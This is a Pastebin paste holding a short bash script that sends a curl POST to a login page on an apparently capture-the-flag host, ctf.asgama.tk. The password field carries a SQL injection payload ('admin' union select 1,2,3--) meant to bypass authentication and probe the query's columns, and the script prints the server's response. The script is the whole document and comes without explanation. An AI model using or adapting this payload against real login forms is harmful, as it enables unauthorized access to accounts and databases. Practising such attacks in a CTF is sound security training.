Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. #!/bin/bash
  2. data="username=admin&password=admin'+union+select+1,2,3--+&login=login";
  3. curl=$(curl -s 'http://ctf.asgama.tk:40108/login.php' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://ctf.asgama.tk:40108' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://ctf.asgama.tk:40108/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --data ''$data'' --compressed)
  4. echo $curl
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement